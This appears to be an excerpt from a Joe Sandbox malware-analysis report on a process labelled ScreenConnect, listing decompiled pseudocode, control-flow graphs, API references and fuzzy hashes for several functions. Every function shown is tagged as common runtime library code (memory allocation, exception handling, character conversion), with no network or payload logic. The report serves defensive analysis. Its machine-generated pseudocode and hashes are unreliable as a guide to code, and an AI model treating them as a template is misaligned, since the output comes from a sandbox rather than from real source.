                                                                          0x003f21dc
                                                                          0x003f21e1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f2181
                                                                          0x003f2193
                                                                          0x00000000

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 003F2186
                                                                            • Part of subcall function 003F477C: __FF_MSGBANNER.LIBCMT ref: 003F4793
                                                                            • Part of subcall function 003F477C: __NMSG_WRITE.LIBCMT ref: 003F479A
                                                                            • Part of subcall function 003F477C: HeapAlloc.KERNEL32(00960000,00000000,00000001,00000000,00000000,00000000,?,003F2611,00000000,00000000,00000000,00000000,?,003F4A9B,00000018,00402C10), ref: 003F47BF
                                                                          • std::exception::exception.LIBCMT ref: 003F21A4
                                                                          • __CxxThrowException@8.LIBCMT ref: 003F21B9
                                                                            • Part of subcall function 003F496E: RaiseException.KERNEL32(?,?,003F13F9,00402B0C,00000000,765747B0,?,?,?,003F21BE,003F13F9,00402B0C,?,00000001), ref: 003F49C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 1059622496-2104205924
                                                                          • Opcode ID: 085d90029e95639cacd3c85a9009c2598f413f80d321a15054be1850e7689f9e
                                                                          • Instruction ID: 0283dc9755d97b1a43e117aae0acc90919ee542fd990b374fcd0bee089f572cb
                                                                          • Opcode Fuzzy Hash: 085d90029e95639cacd3c85a9009c2598f413f80d321a15054be1850e7689f9e
                                                                          • Instruction Fuzzy Hash: 9801D67110421DB6CB03BA98ED06DFFBBAC9F01750F500566FF04A6591EBB19A40C1D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003FCCE4, Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 372 3fcce4-3fccfa call 3f2690 375 3fce9e 372->375 376 3fcd00-3fcd03 372->376 377 3fcea0-3fcea5 call 3f26d5 375->377 376->375 378 3fcd09-3fcd0e 376->378 380 3fcd1c-3fcd23 378->380 381 3fcd10-3fcd16 378->381 382 3fcd2a-3fcd32 380->382 383 3fcd25-3fcd28 380->383 381->375 381->380 385 3fcd34-3fcd37 382->385 386 3fcd83-3fcd8e 382->386 383->382 385->386 389 3fcd39-3fcd40 385->389 387 3fcdb9-3fcdbc 386->387 388 3fcd90-3fcd99 call 3fd115 386->388 392 3fce0f-3fce12 387->392 393 3fcdbe-3fcdc7 call 3fd115 387->393 399 3fcd9f-3fcdab call 3fd115 388->399 400 3fce82 call 3f4cb0 388->400 389->386 391 3fcd42-3fcd53 call 3fd115 389->391 391->400 419 3fcd59-3fcd65 call 3fd115 391->419 395 3fce4d-3fce56 call 3fd115 392->395 396 3fce14-3fce1d call 3fd115 392->396 393->400 409 3fcdcd-3fcdd9 call 3fd115 393->409 395->400 410 3fce58-3fce64 call 3fd115 395->410 396->400 413 3fce1f-3fce2b call 3fd115 396->413 399->400 418 3fcdb1-3fcdb7 399->418 414 3fce87-3fce90 400->414 409->400 421 3fcddf-3fcdf5 call 3f4130 409->421 410->400 427 3fce66-3fce71 call 3fd115 410->427 413->400 429 3fce2d-3fce4b call 3fcc31 call 3f4130 413->429 414->377 423 3fcd6e-3fcd74 418->423 419->400 434 3fcd6b 419->434 421->414 437 3fcdfb-3fcdfe 421->437 430 3fcd75-3fcd7e call 3fcc31 423->430 427->400 442 3fce73-3fce80 427->442 429->414 430->414 434->423 437->414 441 3fce04-3fce0a 437->441 441->430 442->414
                                                                          C-Code - Quality: 41%
                                                                          			E003FCCE4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t41;
				intOrPtr _t42;
				intOrPtr* _t64;
				intOrPtr _t69;
				signed int _t70;
				signed char _t72;
				signed char _t73;
				signed char* _t95;
				signed char _t100;
				signed char** _t102;
				signed char* _t105;
				void* _t106;

				_push(0xc);
				_push(0x402f50);
				E003F2690(__ebx, __edi, __esi);
				_t69 = 0;
				_t41 =  *(_t106 + 0x10);
				_t72 = _t41[4];
				if(_t72 == 0 ||  *((intOrPtr*)(_t72 + 8)) == 0) {
					L34:
					_t42 = 0;
				} else {
					_t100 = _t41[8];
					if(_t100 != 0 || ( *_t41 & 0x80000000) != 0) {
						_t73 =  *_t41;
						_t102 =  *(_t106 + 0xc);
						if(_t73 >= 0) {
							_t102 =  &(_t102[3]) + _t100;
						}
						 *((intOrPtr*)(_t106 - 4)) = _t69;
						_t105 =  *(_t106 + 0x14);
						if(_t73 >= 0 || ( *_t105 & 0x00000010) == 0) {
							L14:
							_push(1);
							_t16 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
							_push( *_t16);
							if((_t73 & 0x00000008) == 0) {
								if(( *_t105 & 0x00000001) == 0) {
									if(_t105[0x18] != _t69) {
										if(E003FD115() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E003FD115(_t102) == 0 || E003FD115(_t105[0x18]) == 0) {
												goto L32;
											} else {
												_t70 = 0;
												_t69 = (_t70 & 0xffffff00 | ( *_t105 & 0x00000004) != 0x00000000) + 1;
												 *((intOrPtr*)(_t106 - 0x1c)) = _t69;
											}
										}
									} else {
										if(E003FD115() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E003FD115(_t102) == 0) {
												goto L32;
											} else {
												_t32 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
												E003F4130(_t102, E003FCC31( *_t32,  &(_t105[8])), _t105[0x14]);
											}
										}
									}
								} else {
									if(E003FD115() == 0) {
										goto L32;
									} else {
										_push(1);
										if(E003FD115(_t102) == 0) {
											goto L32;
										} else {
											_t25 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
											E003F4130(_t102,  *_t25, _t105[0x14]);
											if(_t105[0x14] == 4 &&  *_t102 != 0) {
												_push( &(_t105[8]));
												_push( *_t102);
												goto L13;
											}
										}
									}
								}
							} else {
								if(E003FD115() == 0) {
									goto L32;
								} else {
									_push(1);
									if(E003FD115(_t102) == 0) {
										goto L32;
									} else {
										_t20 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
										_t95 =  *_t20;
										goto L12;
									}
								}
							}
						} else {
							_t64 =  *0x405f60; // 0x0
							if(_t64 == 0) {
								goto L14;
							} else {
								 *(_t106 + 0x10) =  *_t64();
								_push(1);
								if(E003FD115(_t65) == 0) {
									L32:
									E003F4CB0();
								} else {
									_push(1);
									if(E003FD115(_t102) == 0) {
										goto L32;
									} else {
										_t95 =  *(_t106 + 0x10);
										L12:
										 *_t102 = _t95;
										_push( &(_t105[8]));
										_push(_t95);
										L13:
										 *_t102 = E003FCC31();
									}
								}
							}
						}
						 *((intOrPtr*)(_t106 - 4)) = 0xfffffffe;
						_t42 = _t69;
					} else {
						goto L34;
					}
				}
				return E003F26D5(_t42);
			}















                                                                          0x003fcce4
                                                                          0x003fcce6
                                                                          0x003fcceb
                                                                          0x003fccf0
                                                                          0x003fccf2
                                                                          0x003fccf5
                                                                          0x003fccfa
                                                                          0x003fce9e
                                                                          0x003fce9e
                                                                          0x003fcd09
                                                                          0x003fcd09
                                                                          0x003fcd0e
                                                                          0x003fcd1c
                                                                          0x003fcd1e
                                                                          0x003fcd23
                                                                          0x003fcd28
                                                                          0x003fcd28
                                                                          0x003fcd2a
                                                                          0x003fcd2d
                                                                          0x003fcd32
                                                                          0x003fcd83
                                                                          0x003fcd83
                                                                          0x003fcd88
                                                                          0x003fcd88
                                                                          0x003fcd8e
                                                                          0x003fcdbc
                                                                          0x003fce12
                                                                          0x003fce56
                                                                          0x00000000
                                                                          0x003fce58
                                                                          0x003fce58
                                                                          0x003fce64
                                                                          0x00000000
                                                                          0x003fce73
                                                                          0x003fce78
                                                                          0x003fce7c
                                                                          0x003fce7d
                                                                          0x003fce7d
                                                                          0x003fce64
                                                                          0x003fce14
                                                                          0x003fce1d
                                                                          0x00000000
                                                                          0x003fce1f
                                                                          0x003fce1f
                                                                          0x003fce2b
                                                                          0x00000000
                                                                          0x003fce2d
                                                                          0x003fce37
                                                                          0x003fce43
                                                                          0x003fce48
                                                                          0x003fce2b
                                                                          0x003fce1d
                                                                          0x003fcdbe
                                                                          0x003fcdc7
                                                                          0x00000000
                                                                          0x003fcdcd
                                                                          0x003fcdcd
                                                                          0x003fcdd9
                                                                          0x00000000
                                                                          0x003fcddf
                                                                          0x003fcde5
                                                                          0x003fcde9
                                                                          0x003fcdf5
                                                                          0x003fce07
                                                                          0x003fce08
                                                                          0x00000000
                                                                          0x003fce08
                                                                          0x003fcdf5
                                                                          0x003fcdd9
                                                                          0x003fcdc7
                                                                          0x003fcd90
                                                                          0x003fcd99
                                                                          0x00000000
                                                                          0x003fcd9f
                                                                          0x003fcd9f
                                                                          0x003fcdab
                                                                          0x00000000
                                                                          0x003fcdb1
                                                                          0x003fcdb4
                                                                          0x003fcdb4
                                                                          0x00000000
                                                                          0x003fcdb4
                                                                          0x003fcdab
                                                                          0x003fcd99
                                                                          0x003fcd39
                                                                          0x003fcd39
                                                                          0x003fcd40
                                                                          0x00000000
                                                                          0x003fcd42
                                                                          0x003fcd44
                                                                          0x003fcd47
                                                                          0x003fcd53
                                                                          0x003fce82
                                                                          0x003fce82
                                                                          0x003fcd59
                                                                          0x003fcd59
                                                                          0x003fcd65
                                                                          0x00000000
                                                                          0x003fcd6b
                                                                          0x003fcd6b
                                                                          0x003fcd6e
                                                                          0x003fcd6e
                                                                          0x003fcd73
                                                                          0x003fcd74
                                                                          0x003fcd75
                                                                          0x003fcd7c
                                                                          0x003fcd7c
                                                                          0x003fcd65
                                                                          0x003fcd53
                                                                          0x003fcd40
                                                                          0x003fce87
                                                                          0x003fce8e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003fcd0e
                                                                          0x003fcea5

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer_memmove
                                                                          • String ID:
                                                                          • API String ID: 1721217611-0
                                                                          • Opcode ID: 09101293cf233db6767811235965d21c73178d7906e29aefc458f63cd75c2bf1
                                                                          • Instruction ID: 8710a61fdbe283efc599b721d3c15f2e07b8f9b418a719004f054f02ce2333fb
                                                                          • Opcode Fuzzy Hash: 09101293cf233db6767811235965d21c73178d7906e29aefc458f63cd75c2bf1
                                                                          • Instruction Fuzzy Hash: DE41D43129430F5EEB2B5E24DA82B7A37F9AF50720F25502DFB448B5E1EB71D881D650
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F84DA, Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 444 3f84da-3f84e7 445 3f84e9-3f84ee 444->445 446 3f8501 444->446 445->446 447 3f84f0-3f84f3 445->447 448 3f8503-3f8508 446->448 449 3f8509-3f851f call 3f4f96 447->449 450 3f84f5-3f84fa 447->450 454 3f8536-3f8547 call 3f841c 449->454 455 3f8521-3f8526 449->455 450->446 452 3f84fc-3f84fe 450->452 452->446 463 3f8589-3f85aa MultiByteToWideChar 454->463 464 3f8549-3f8550 454->464 456 3f852e-3f8531 455->456 457 3f8528-3f852b 455->457 459 3f85ba-3f85be 456->459 457->456 461 3f85c7-3f85ca 459->461 462 3f85c0-3f85c3 459->462 461->448 462->461 463->459 465 3f85ac-3f85b4 call 3f2218 463->465 466 3f8579 464->466 467 3f8552-3f8555 464->467 465->459 469 3f857c 466->469 467->469 470 3f8557-3f8577 MultiByteToWideChar 467->470 469->465 473 3f857e-3f8582 469->473 470->466 472 3f8584-3f8587 470->472 472->459 473->465 473->472
                                                                          C-Code - Quality: 100%
                                                                          			E003F84DA(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E003F4F96( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E003F841C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E003F2218();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                                          0x003f84e2
                                                                          0x003f84e7
                                                                          0x003f8501
                                                                          0x00000000
                                                                          0x003f8501
                                                                          0x003f84e9
                                                                          0x003f84ee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f84f3
                                                                          0x003f8510
                                                                          0x003f8515
                                                                          0x003f8518
                                                                          0x003f851f
                                                                          0x003f853e
                                                                          0x003f8545
                                                                          0x003f8547
                                                                          0x003f858b
                                                                          0x003f859a
                                                                          0x003f85a2
                                                                          0x003f85a8
                                                                          0x003f85aa
                                                                          0x003f85ba
                                                                          0x003f85ba
                                                                          0x003f85be
                                                                          0x003f85c0
                                                                          0x003f85c3
                                                                          0x003f85c3
                                                                          0x003f85c3
                                                                          0x003f85c3
                                                                          0x00000000
                                                                          0x003f85c9
                                                                          0x003f85ac
                                                                          0x003f85ac
                                                                          0x003f85b1
                                                                          0x003f85b1
                                                                          0x003f85b4
                                                                          0x00000000
                                                                          0x003f85b4
                                                                          0x003f8549
                                                                          0x003f854c
                                                                          0x003f8550
                                                                          0x003f8579
                                                                          0x003f8579
                                                                          0x003f857c
                                                                          0x003f857c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f857e
                                                                          0x003f8582
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f8584
                                                                          0x003f8584
                                                                          0x00000000
                                                                          0x003f8584
                                                                          0x003f8552
                                                                          0x003f8555
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f8559
                                                                          0x003f856c
                                                                          0x003f8572
                                                                          0x003f8575
                                                                          0x003f8577
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f8577
                                                                          0x003f8521
                                                                          0x003f8524
                                                                          0x003f8526
                                                                          0x003f852b
                                                                          0x003f852b
                                                                          0x003f8530
                                                                          0x00000000
                                                                          0x003f8530
                                                                          0x003f84f5
                                                                          0x003f84fa
                                                                          0x003f84fe
                                                                          0x003f84fe
                                                                          0x00000000

                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003F8510
                                                                          • __isleadbyte_l.LIBCMT ref: 003F853E
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 003F856C
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 003F85A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: ef3096bf0b4c777e21136d8026b36126f76ef6ceadbaa6ce92432abb40dc7038
                                                                          • Instruction ID: 2bf23b7970497822b34d62db2309bd3d2a375dbba815f63148c4ee1d73f18b98
                                                                          • Opcode Fuzzy Hash: ef3096bf0b4c777e21136d8026b36126f76ef6ceadbaa6ce92432abb40dc7038
                                                                          • Instruction Fuzzy Hash: 1231723160025EEFDB2B8F65CC45BBA7BA9FF42310F164529F9598B1A0EB31D850DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F3E3D, Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E003F3E3D(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc(L"lation", 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x405f40 == _t7) {
									_t9 = E003F2218();
									 *_t9 = E003F222B(GetLastError());
									goto L17;
								} else {
									if(E003F493B(_t7, _t31) == 0) {
										_t12 = E003F2218();
										 *_t12 = E003F222B(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E003F493B(_t6, _t31);
						 *((intOrPtr*)(E003F2218())) = 0xc;
						goto L12;
					} else {
						E003F1B1F(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E003F477C(__ebx, __edx, __edi, _a8);
				}
			}









                                                                          0x003f3e44
                                                                          0x003f3e52
                                                                          0x003f3e57
                                                                          0x003f3e66
                                                                          0x003f3e99
                                                                          0x003f3e6b
                                                                          0x003f3e6d
                                                                          0x003f3e6d
                                                                          0x003f3e7a
                                                                          0x003f3e80
                                                                          0x003f3e84
                                                                          0x003f3ee4
                                                                          0x003f3ee4
                                                                          0x003f3e86
                                                                          0x003f3e8c
                                                                          0x003f3ece
                                                                          0x003f3ee2
                                                                          0x00000000
                                                                          0x003f3e8e
                                                                          0x003f3e97
                                                                          0x003f3eb6
                                                                          0x003f3eca
                                                                          0x003f3eb0
                                                                          0x003f3eb0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003f3e97
                                                                          0x003f3e8c
                                                                          0x00000000
                                                                          0x003f3eb2
                                                                          0x003f3e9f
                                                                          0x003f3eaa
                                                                          0x00000000
                                                                          0x003f3e59
                                                                          0x003f3e5c
                                                                          0x003f3e62
                                                                          0x003f3e62
                                                                          0x003f3eb3
                                                                          0x003f3eb5
                                                                          0x003f3e46
                                                                          0x003f3e50
                                                                          0x003f3e50

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 003F3E49
                                                                            • Part of subcall function 003F477C: __FF_MSGBANNER.LIBCMT ref: 003F4793
                                                                            • Part of subcall function 003F477C: __NMSG_WRITE.LIBCMT ref: 003F479A
                                                                            • Part of subcall function 003F477C: HeapAlloc.KERNEL32(00960000,00000000,00000001,00000000,00000000,00000000,?,003F2611,00000000,00000000,00000000,00000000,?,003F4A9B,00000018,00402C10), ref: 003F47BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap_malloc
                                                                          • String ID:
                                                                          • API String ID: 3293231637-0
                                                                          • Opcode ID: 177810759eb1be7f4978009c650fa0830197783d9e559306507d608a8fef0382
                                                                          • Instruction ID: 8b0109bc76ec18691a9f26e35e6788209086762aa184647feaade757bb240996
                                                                          • Opcode Fuzzy Hash: 177810759eb1be7f4978009c650fa0830197783d9e559306507d608a8fef0382
                                                                          • Instruction Fuzzy Hash: B611E33350521EFADB633B75AC4567F379CAF20360F114525FB44AE2A0DB34CA8086A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F9D6D, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E003F9D6D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E003FA2BE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E003F9DF3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E003FA539(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E003FA478(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                          0x003f9d70
                                                                          0x003f9d76
                                                                          0x003f9de9
                                                                          0x00000000
                                                                          0x003f9d7d
                                                                          0x003f9d7d
                                                                          0x003f9d80
                                                                          0x003f9d9b
                                                                          0x003f9d9e
                                                                          0x003f9dbe
                                                                          0x003f9dd0
                                                                          0x003f9da0
                                                                          0x003f9da0
                                                                          0x003f9da3
                                                                          0x00000000
                                                                          0x003f9da5
                                                                          0x003f9db7
                                                                          0x003f9db7
                                                                          0x003f9da3
                                                                          0x003f9dee
                                                                          0x003f9df2
                                                                          0x003f9d82
                                                                          0x003f9d9a
                                                                          0x003f9d9a
                                                                          0x003f9d80

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: effc67f6daf09f16d298259f4d2c94a1fea39bccfb685214f5c9d6f60506dc00
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: D701787600014EBBCF136F84CC02AEE3F26BB08340B298416FB1899131D336C9B1AB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003FC628, Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 20%
                                                                          			E003FC628(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E003FCC56(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E003FC1D2(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E003FCEF4(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E003FC422(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E003FC1A0(_t25, _t29);
					return _t25;
				}
				return _t25;
			}











                                                                          0x003fc628
                                                                          0x003fc628
                                                                          0x003fc62b
                                                                          0x003fc630
                                                                          0x003fc633
                                                                          0x003fc635
                                                                          0x003fc638
                                                                          0x003fc63b
                                                                          0x003fc63c
                                                                          0x003fc63f
                                                                          0x003fc644
                                                                          0x003fc644
                                                                          0x003fc647
                                                                          0x003fc64b
                                                                          0x003fc64e
                                                                          0x003fc653
                                                                          0x003fc650
                                                                          0x003fc650
                                                                          0x003fc650
                                                                          0x003fc656
                                                                          0x003fc65b
                                                                          0x003fc65c
                                                                          0x003fc65f
                                                                          0x003fc661
                                                                          0x003fc664
                                                                          0x003fc667
                                                                          0x003fc668
                                                                          0x003fc671
                                                                          0x003fc676
                                                                          0x003fc679
                                                                          0x003fc67f
                                                                          0x003fc682
                                                                          0x003fc685
                                                                          0x003fc688
                                                                          0x003fc689
                                                                          0x003fc68c
                                                                          0x003fc697
                                                                          0x003fc69b
                                                                          0x00000000
                                                                          0x003fc69b
                                                                          0x003fc6a2

                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 003FC63F
                                                                            • Part of subcall function 003FCC56: ___AdjustPointer.LIBCMT ref: 003FCC9F
                                                                          • _UnwindNestedFrames.LIBCMT ref: 003FC656
                                                                          • ___FrameUnwindToState.LIBCMT ref: 003FC668
                                                                          • CallCatchBlock.LIBCMT ref: 003FC68C
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
